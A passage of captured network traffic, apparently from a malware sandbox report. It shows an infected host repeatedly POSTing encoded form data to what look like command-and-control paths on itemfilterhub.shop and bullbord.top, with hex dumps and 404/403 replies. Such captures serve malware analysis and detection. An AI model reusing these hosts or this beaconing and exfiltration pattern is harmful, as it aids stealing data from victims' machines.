                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWu%2BcTHG6yFtHhae%2F9RP2E9eT4UQgBQWV7mP4buF6ufYjgMPywymG%2Bk%2FLhQx36WZM7kyidV5m3Iy0mLIGkM2tdfwPG0nzHrM8eL3Otyo%2FXphOQ379yTVPi5xsHVOF9NCqTe2wJhTFTtt"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dcfa3b3420a2-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>
                                                Aug 27, 2024 08:04:16.565443993 CEST5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                71192.168.11.2049913172.67.166.14580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:18.936269045 CEST1172OUTPOST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 53 48 63 41 6a 36 43 48 44 6c 30 2b 68 2b 62 42 56 71 62 4d 6c 45 6e 4a 75 58 30 6c 44 63 47 73 38 4d 2f 4a 79 33 62 45 38 6d 6b 78 46 43 79 30 76 4c 69 41 54 75 33 73 39 77 6b 73 4a 50 58 74 43 34 56 41 36 48 4d 7a 57 45 55 45 35 6d 4b 38 4e 2f 70 31 53 59 66 52 45 79 4e 65 54 50 75 6a 6e 54 42 54 32 4b 65 56 57 73 4c 2b 56 46 77 50 64 53 31 42 66 37 58 4b 36 44 70 53 66 4b 4e 72 2b 58 5a 69 75 31 39 51 41 65 67 7a 49 71 4b 57 58 58 7a 7a 39 67 45 33 6e 74 77 54 42 55 58 66 57 67 49 76 50 4e 66 78 4d 36 6d 4e 65 37 68 36 41 47 5a 67 55 51 52 76 53 5a 70 4e 33 52 42 46 36 51 4d 68 4e 31 76 77 35 57 54 53 49 74 77 39 51 75 52 4b 5a 69 67 6c 5a 6c 41 69 47 4c 61 42 33 52 39 53 2b 73 6f 56 53 34 32 67 41 7a 39 78 54 65 6d 45 76 42 6c 71 36 33 79 44 31 59 5a 6c 48 4d 6c 7a 46 75 73 78 68 47 73 34 6e 35 4c 70 7a 6a 64 36 51 52 76 6f 6b 6b 5a 64 2b 41 64 35 6c 39 57 56 7a 39 41 4c 45 67 2b 76 4d 6a 77 7a 39 64 38 75 41 77 4d 64 4c 72 4d 68 41 [TRUNCATED]
                                                Data Ascii: ij60MtY=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDcGs8M/Jy3bE8mkxFCy0vLiATu3s9wksJPXtC4VA6HMzWEUE5mK8N/p1SYfREyNeTPujnTBT2KeVWsL+VFwPdS1Bf7XK6DpSfKNr+XZiu19QAegzIqKWXXzz9gE3ntwTBUXfWgIvPNfxM6mNe7h6AGZgUQRvSZpN3RBF6QMhN1vw5WTSItw9QuRKZiglZlAiGLaB3R9S+soVS42gAz9xTemEvBlq63yD1YZlHMlzFusxhGs4n5Lpzjd6QRvokkZd+Ad5l9WVz9ALEg+vMjwz9d8uAwMdLrMhAII04ZNH+jpTqTN+Xgf+Miso3I3haq7D585zczZ0cppJwlAhIPEel7Y2E4zTaDHaw7HAvL7tsBiScry4EBwQ6EhBWOftE8cZktyKVD4w2xp7/mnwCunmr8mzx2EXj2o/0U7pYyU9rmzKRxu/1lLT2PqoIWtjjMvI3U0wBf4RV4gVjeL+obxvQ9OIuiT/q8Cdnsw0B/zsrFjQ2A=
                                                Aug 27, 2024 08:04:19.188381910 CEST738INHTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 06:04:19 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bRUdkVo5FXCeMAt5luK7JkC%2FqJp73IDV59U6Vp8NEtoy%2BSmUaAf5Yw1nr2dbEnVJoui6cvb%2FFEIAEgZgUsdrphedYCpr94APtPLnKIMf8kry%2FjSWu6S744XLeHMORSq1GgqkI%2BbLeinw"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dd0aac063958-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 37 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 0d 0a
                                                Data Ascii: 7f\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk
                                                Aug 27, 2024 08:04:19.188461065 CEST15INData Raw: 61 0d 0a 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                Data Ascii: a8>
                                                Aug 27, 2024 08:04:19.188469887 CEST5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                72192.168.11.2049914172.67.166.14580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:21.578556061 CEST1289OUTPOST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 53 48 63 41 6a 36 43 48 44 6c 30 2b 68 2b 62 42 56 71 62 4d 6c 45 6e 4a 75 58 30 6c 44 55 47 73 4b 41 2f 4c 52 66 62 65 38 6d 6b 2b 56 43 7a 30 76 4c 37 41 51 65 7a 73 39 38 65 73 50 4c 58 71 52 77 56 41 6f 76 4d 32 57 45 56 42 35 6d 49 34 4e 2f 39 31 53 55 4c 52 46 44 34 65 69 72 75 67 6b 4c 42 58 42 65 64 4e 57 73 4a 2b 56 46 38 46 39 53 48 42 65 71 49 4b 36 48 70 53 5a 53 4e 71 49 54 5a 68 39 64 39 45 41 65 6e 35 6f 71 2f 63 33 58 47 7a 39 30 71 33 6e 74 4b 54 41 51 58 66 52 73 49 75 4f 4e 41 78 73 36 6d 43 4f 37 2b 77 67 4b 56 67 58 6b 5a 76 53 46 70 4e 33 4a 42 45 61 51 4d 33 2f 64 75 33 5a 57 56 51 34 73 77 35 51 71 5a 4b 5a 48 52 6c 62 70 41 69 32 76 61 54 77 4e 39 42 71 34 6f 4c 69 35 51 6b 41 7a 49 2f 7a 65 45 45 76 52 44 71 36 58 49 44 79 59 5a 6c 6d 73 6c 35 45 75 76 32 42 47 75 33 48 34 52 34 6a 76 42 36 51 42 46 6f 6b 6c 65 64 37 77 64 35 56 74 57 55 78 56 48 4d 55 67 6b 37 38 6a 2b 36 64 68 69 75 45 6f 45 64 4b 69 4a 68 48 [TRUNCATED]
                                                Data Ascii: ij60MtY=aUfPfTh9K6lI4SHcAj6CHDl0+h+bBVqbMlEnJuX0lDUGsKA/LRfbe8mk+VCz0vL7AQezs98esPLXqRwVAovM2WEVB5mI4N/91SULRFD4eirugkLBXBedNWsJ+VF8F9SHBeqIK6HpSZSNqITZh9d9EAen5oq/c3XGz90q3ntKTAQXfRsIuONAxs6mCO7+wgKVgXkZvSFpN3JBEaQM3/du3ZWVQ4sw5QqZKZHRlbpAi2vaTwN9Bq4oLi5QkAzI/zeEEvRDq6XIDyYZlmsl5Euv2BGu3H4R4jvB6QBFokled7wd5VtWUxVHMUgk78j+6dhiuEoEdKiJhHQImIZNBZ/obaSLmXgB6Mi3o20BhYGBDJQ5hcjZicpqCwkL74PZal7Y2EEGTaPHahzHBdT7mb1iUcq34EBtQ6JdBWX+tFM6ZnByKEz433xotfmoniu877xwzxCyXjm4/k47oYiU5rmwaBxp+1kOX2L2oILVjgRiI380yFeECUQ9JAClh8TK+ixuP8uV2coeVwAfwTzJzbhzPAxBIs6O4po+LW90bxKemRiUB4clbuTM/kLOjukUixtibN8qoR0UQXs4yNEpLDyvF6d7+R6ZS1igO6yMu6iXK8lbjBzLQrYq0akcxKg5VIhyZdIR25suy8s
                                                Aug 27, 2024 08:04:21.578605890 CEST2578OUTData Raw: 39 4d 32 2b 59 45 64 7a 6a 5a 73 78 48 66 6a 49 37 48 32 4d 39 72 61 32 6d 4b 72 45 42 74 48 33 6f 45 35 66 6e 6c 42 50 30 6b 31 75 56 37 44 35 69 63 65 77 43 48 77 31 2b 59 78 67 78 46 65 59 46 64 65 4e 5a 38 6d 30 38 46 32 6f 41 62 49 76 76 65
                                                Data Ascii: 9M2+YEdzjZsxHfjI7H2M9ra2mKrEBtH3oE5fnlBP0k1uV7D5icewCHw1+YxgxFeYFdeNZ8m08F2oAbIvve6xRV472VDyDijmHcWlGEMnImwoPg7QXsQGDXsNSA3P5w11EP9QwvgOWSO8Ehgsafqtv17VjdLLTCmlE1gciL/IKVR6Hllrmpko8C4QLYJ4bie0YiPtEyMYVaepMe4egQkZb6oCHhtc0VPkS3o+wp3eqsV2WE/XFZZ
                                                Aug 27, 2024 08:04:21.578659058 CEST9023OUTData Raw: 6b 6a 6e 73 6a 58 48 43 45 7a 78 73 74 34 42 49 74 42 72 4e 69 78 71 37 67 56 38 52 66 72 56 6f 37 57 63 37 4d 6f 76 71 71 59 4b 43 61 33 70 4f 44 2b 4a 63 36 6b 37 33 42 63 36 6a 6f 43 41 51 69 5a 30 72 76 42 75 52 34 57 4a 6a 4d 64 51 77 30 72
                                                Data Ascii: kjnsjXHCEzxst4BItBrNixq7gV8RfrVo7Wc7MovqqYKCa3pOD+Jc6k73Bc6joCAQiZ0rvBuR4WJjMdQw0rKkdv0+BvspfX0h8LP9hVIj9oiyWpahT6j/7ULm06RK7XILDiN05DgbhsE0z43iw7lE7H2tI3n1awMMfeSRPYuky4MmQ9LtcfI/FbF/6d2SdOIfJEKqrGfzSHQnObFSEtKnwPJknHL4JzdH+tJIRuQnIXOHf6YdvJo
                                                Aug 27, 2024 08:04:21.679269075 CEST1289OUTData Raw: 4a 74 4d 2b 68 6e 77 4f 2b 6a 43 4d 6c 2f 75 34 4f 4b 2b 48 50 6b 66 7a 44 4c 42 62 74 4c 43 35 50 6e 69 46 36 47 7a 44 55 59 4e 45 50 49 34 35 6b 59 6d 33 45 65 6b 4f 6e 66 6c 65 52 67 69 69 63 6a 65 35 6a 73 34 77 48 66 4c 68 49 76 78 65 74 59
                                                Data Ascii: JtM+hnwO+jCMl/u4OK+HPkfzDLBbtLC5PniF6GzDUYNEPI45kYm3EekOnfleRgiicje5js4wHfLhIvxetYEc9QBjiqGO44s9rAQ9fx24ERD7lbtuTE+sO+Zf5qT+DFNEBodaNih/8RN9jfYHjlL4PS4wQKlNZON9iUxn3BChjEYfTCv78Nuq77DwDrXLXcE1WhIq29d2igGwyF+clu4ldwREfGIBG8QyXzk6gfHitDd7rHUg6L7
                                                Aug 27, 2024 08:04:21.679321051 CEST1289OUTData Raw: 65 64 6f 32 36 67 41 4d 33 72 4e 4b 52 4d 43 41 62 6d 70 49 2b 53 45 49 6f 35 62 58 47 43 5a 2f 4a 6a 58 79 62 48 79 2f 62 39 34 51 77 51 34 72 37 4b 45 72 61 62 31 41 53 43 77 52 62 6c 53 74 62 54 33 78 6e 44 33 74 52 63 76 41 6b 47 31 4f 6c 73
                                                Data Ascii: edo26gAM3rNKRMCAbmpI+SEIo5bXGCZ/JjXybHy/b94QwQ4r7KErab1ASCwRblStbT3xnD3tRcvAkG1OlsxOAgZwZnYahIIzvT+qBHw2IGsGqpjXSkFxMs4RfGsll9QfXrPFXHc7A/0azu6VEWH+877+wEQJSlpY/xqXj9+OKLeEbFNV5PiwmkErqGisp4ewq8SUokkXghuGsvd0q7XmorZcAfzwtcVJLgdU2FvQDUdRzpAlZFm
                                                Aug 27, 2024 08:04:21.679538965 CEST10312OUTData Raw: 68 4b 35 53 4e 71 34 31 49 33 2f 45 4d 61 43 6e 77 35 44 46 61 71 39 34 4e 4a 42 39 52 32 56 45 32 66 44 44 62 38 73 71 57 57 32 34 38 72 4c 49 63 4a 32 7a 4e 31 48 6c 53 67 2b 4d 31 45 66 65 42 76 35 51 4e 71 4a 61 34 2f 41 32 65 50 46 55 75 4e
                                                Data Ascii: hK5SNq41I3/EMaCnw5DFaq94NJB9R2VE2fDDb8sqWW248rLIcJ2zN1HlSg+M1EfeBv5QNqJa4/A2ePFUuNpngDgRaYOrlEID6OpejtA/oEj+N1nSsS1TPf0n3oWuuJNkh0abI/SuEFTN9F3TDNanUMIfcVAfgfqd/OyY/IdPcgDdDjGVVoIJQchXZ2AhkdWzR38ovQMEb2QX3l2KW8Dj30zLMUWzf9J3GlFUiqR57wU7BjfQ0Al
                                                Aug 27, 2024 08:04:21.679708004 CEST2578OUTData Raw: 75 50 54 70 35 43 63 41 6c 73 34 50 74 2f 63 41 6a 77 39 74 6a 35 64 48 35 39 69 53 70 37 6f 43 7a 6d 45 4c 52 77 64 62 4f 73 54 66 61 64 30 73 30 31 2b 4f 37 76 57 65 77 4f 4d 75 6b 54 31 33 69 4f 62 4c 67 2b 34 2b 41 7a 38 51 65 39 76 43 62 63
                                                Data Ascii: uPTp5CcAls4Pt/cAjw9tj5dH59iSp7oCzmELRwdbOsTfad0s01+O7vWewOMukT13iObLg+4+Az8Qe9vCbchiCefYiBMGB+gM084xepihkWzzZ5JEZiliu+nfIFNrtEiNgnd8BI7ODhvF9GkRQFCbG7QxNyMMrtvXyKtcGOMOXS+ZAdrHwKFPjGGX7xri7H84g4ON62b8R/OIVzhwgAW9uO3EWuQWC2iZuopl8X/5nOfsaTVKVfi
                                                Aug 27, 2024 08:04:21.679878950 CEST7734OUTData Raw: 4b 64 35 31 70 66 75 35 43 53 71 59 4d 55 67 57 30 50 45 65 31 59 4c 65 65 66 76 75 6c 78 37 32 70 54 74 73 68 76 50 74 56 2f 52 6e 64 35 4a 6f 54 39 47 4a 47 36 30 2b 41 45 7a 5a 74 33 72 37 32 56 42 66 55 6d 69 52 51 33 48 59 6a 38 4c 44 4b 39
                                                Data Ascii: Kd51pfu5CSqYMUgW0PEe1YLeefvulx72pTtshvPtV/Rnd5JoT9GJG60+AEzZt3r72VBfUmiRQ3HYj8LDK9L4b7ErXwLwxXTQcBaX9ShyEn6LBt/QsMbO1804LZxK6YZ9kd8+f/ZSbhjerReMF/EkTJYltseK77Uo6eXiU5bVzyHs0EERbH705e9xUoPTwDzgY7rvHAePtkQb+fpZSNxi+mMENQC6kbOwzTc9jQFemLecVMDBM6/
                                                Aug 27, 2024 08:04:21.680047035 CEST2578OUTData Raw: 34 57 44 6b 41 64 37 33 37 2b 45 30 42 57 5a 36 50 53 6c 72 73 43 37 55 42 68 6b 65 34 6b 79 6c 55 6e 5a 72 73 73 75 34 61 79 37 52 41 5a 59 33 53 68 6f 72 2b 5a 4c 53 36 4d 6b 30 4c 71 59 37 5a 74 71 6f 4c 36 6d 32 75 2b 2f 79 45 2f 47 30 76 79
                                                Data Ascii: 4WDkAd737+E0BWZ6PSlrsC7UBhke4kylUnZrssu4ay7RAZY3Shor+ZLS6Mk0LqY7ZtqoL6m2u+/yE/G0vy+z+CTzMJbiP6OlWB4+CcWDx1ZXPGLHKO9EKoB0xVHrtPSlLBbi8AluL/LyDZaW06P4eu72OVKUA21QkBn/Sary42rarDAwXe8Nq+8GHjgbpeXAzFMOlU3ko5bPQb1FjtftV/nbW79Eczd7ccJzJnJ9ymubfDKEqQu
                                                Aug 27, 2024 08:04:21.780345917 CEST1289OUTData Raw: 78 44 78 41 6c 41 6e 2b 6f 52 46 48 72 49 48 53 65 50 66 34 37 68 46 7a 4d 35 70 59 4f 31 66 30 49 52 6e 4c 59 50 78 49 37 30 57 6f 73 7a 61 30 69 4f 62 6f 69 64 62 77 49 41 71 69 78 7a 6d 4d 36 6c 33 52 56 79 52 77 46 73 51 70 58 76 4c 4a 64 75
                                                Data Ascii: xDxAlAn+oRFHrIHSePf47hFzM5pYO1f0IRnLYPxI70Wosza0iOboidbwIAqixzmM6l3RVyRwFsQpXvLJduO2NTlN6rKI7bK3kp6DjRHqVYMk+RZpY7iy4ycc3Xe9htuwRjenUYoCtjs7qHMKfwQFL540ksNRt31seJMbZea9HKVDSFcLNHkeVWZ1xAYruM0KRH5LuigLSkL9SxsMT7w5xdFg3qkFUWXt86O/DdO16TJ8HuYH2fW
                                                Aug 27, 2024 08:04:21.780395985 CEST3867OUTData Raw: 48 33 63 70 7a 67 69 79 31 74 76 30 31 71 4a 42 4c 42 44 56 7a 6a 67 57 58 39 45 2b 6d 73 59 48 61 6f 4f 33 6b 77 53 39 49 78 57 32 45 6a 54 72 70 62 2f 6f 38 47 58 6e 79 71 4c 56 62 42 43 44 4e 6b 32 6f 44 6f 35 5a 51 71 6d 66 46 76 39 68 2f 51
                                                Data Ascii: H3cpzgiy1tv01qJBLBDVzjgWX9E+msYHaoO3kwS9IxW2EjTrpb/o8GXnyqLVbBCDNk2oDo5ZQqmfFv9h/QZkb/MaKdyarMHI8HQl6Tjz173jLlZMopaGpNxsiGHDHYbjP1nbehrTAOg3apEqWCBEMZ5c/AOJAEoz/+dmIOo/gSS46rwqFbU3hzLqbkkxKXO9w7h9i1RGsa9bogJiJn3jGlUX/xQ8MGUJnEoEb80mV+HxUY2T1xL
                                                Aug 27, 2024 08:04:22.023859978 CEST742INHTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 06:04:21 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2JH1AiwRRzthgqwPCw1A04AidlXb0ia1tOL8ifolnDxZxIaVsXADa5nSZcvrmws5guY6y8cyV0CDB8hkOQWQ%2BG8UsdeU58%2F8oPkTWDFvXQpkHguadZaiKDYLyW7SaMAJN7WVz8jW68e"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dd1b3a64c99d-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 5c 8e 41 0a c3 30 10 03 ef 7e 45 c8 03 b2 31 69 6f ea 1e fb 8f 3a 5e b2 06 c7 06 b3 d0 f6 f7 25 69 02 a5 27 81 34 42 82 da 9a d9 41 e5 11 19 96 2c 0b 5f c6 a9 bb d7 16 52 8c 52 40 5f 13 b4 23 0e a1 c6 77 17 96 b9 e6 da 6e fd 53 93 49 cf 0e b3 14 93 c6 50 ff df 57 cf a0 23 76 d0 c6 27 5b 96 54 5e e4 07 7f 1d c6 1f 82 b6 85 4d f7 6b 1f 00 00 00 ff ff 03 00 96 12 38 3e a1 00 00 00 0d 0a
                                                Data Ascii: 89\A0~E1io:^%i'4BA,_RR@_#wnSIPW#v'[T^Mk8>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                73192.168.11.2049915172.67.166.14580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:24.214206934 CEST552OUTGET /p1v4/?ij60MtY=XW3vckNGBZMqkh6dDgKTVQdtxgWhQhuqI1UaXPyLgSYWv7ViPFn3HMqwy3qnuuGBWlC3pPEFi6D5pQsjZrraxjUjA6OulNf3kQwJOyuMay6JsEDMWEmFSkY=&wXB=brv4Erb HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:24.487061977 CEST748INHTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 06:04:24 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WJr5VpW%2B3krdXKHO%2BJ0q9YLGkDtX41Iw9HJdiJFEduhkmxMt%2FrdePWKJu25VGObcI4OMoYW6ZAHhAwL860g%2BwnDrHgDeG5eb61cfQ9weCrsQgadXcWyc7FVbFYCPnXB4T%2B0FllSFpEbG"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dd2ba8405842-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 61 31 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: a1<html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.15.0</center></body></html>
                                                Aug 27, 2024 08:04:24.487073898 CEST5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                74192.168.11.2049916203.161.46.20580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:29.671473980 CEST814OUTPOST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 34 39 52 2b 61 42 42 78 39 7a 30 5a 45 5a 34 69 6e 58 6c 64 67 47 54 41 50 30 4a 2b 4c 73 65 44 46 43 46 42 2f 39 58 64 76 67 68 67 7a 6a 55 30 35 79 70 67 6a 6e 61 45 4a 55 43 2b 57 6b 78 4f 4e 65 76 4b 6c 77 7a 61 4e 54 70 4a 75 6a 74 57 75 64 78 63 68 76 6a 53 44 68 74 38 42 68 4b 4d 71 58 5a 6a 4e 38 62 36 6d 35 4b 61 69 55 39 7a 70 4b 6a 48 73 52 69 4e 56 74 78 48 4c 30 5a 4f 42 61 77 68 4a 6d 4a 58 70 58 4d 75 78 4b 53 73 71 67 71 76 59 70 37 6a 32 41 46 65 65 69 57 63 38 38 56 6e 6e 42 67 6e 57 75 6c 39 4a 2b 6b 4e 55 65 67 68 44 67 3d 3d
                                                Data Ascii: ij60MtY=PRYlSxU0BJHV49R+aBBx9z0ZEZ4inXldgGTAP0J+LseDFCFB/9XdvghgzjU05ypgjnaEJUC+WkxONevKlwzaNTpJujtWudxchvjSDht8BhKMqXZjN8b6m5KaiU9zpKjHsRiNVtxHL0ZOBawhJmJXpXMuxKSsqgqvYp7j2AFeeiWc88VnnBgnWul9J+kNUeghDg==
                                                Aug 27, 2024 08:04:29.841197014 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:04:29 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
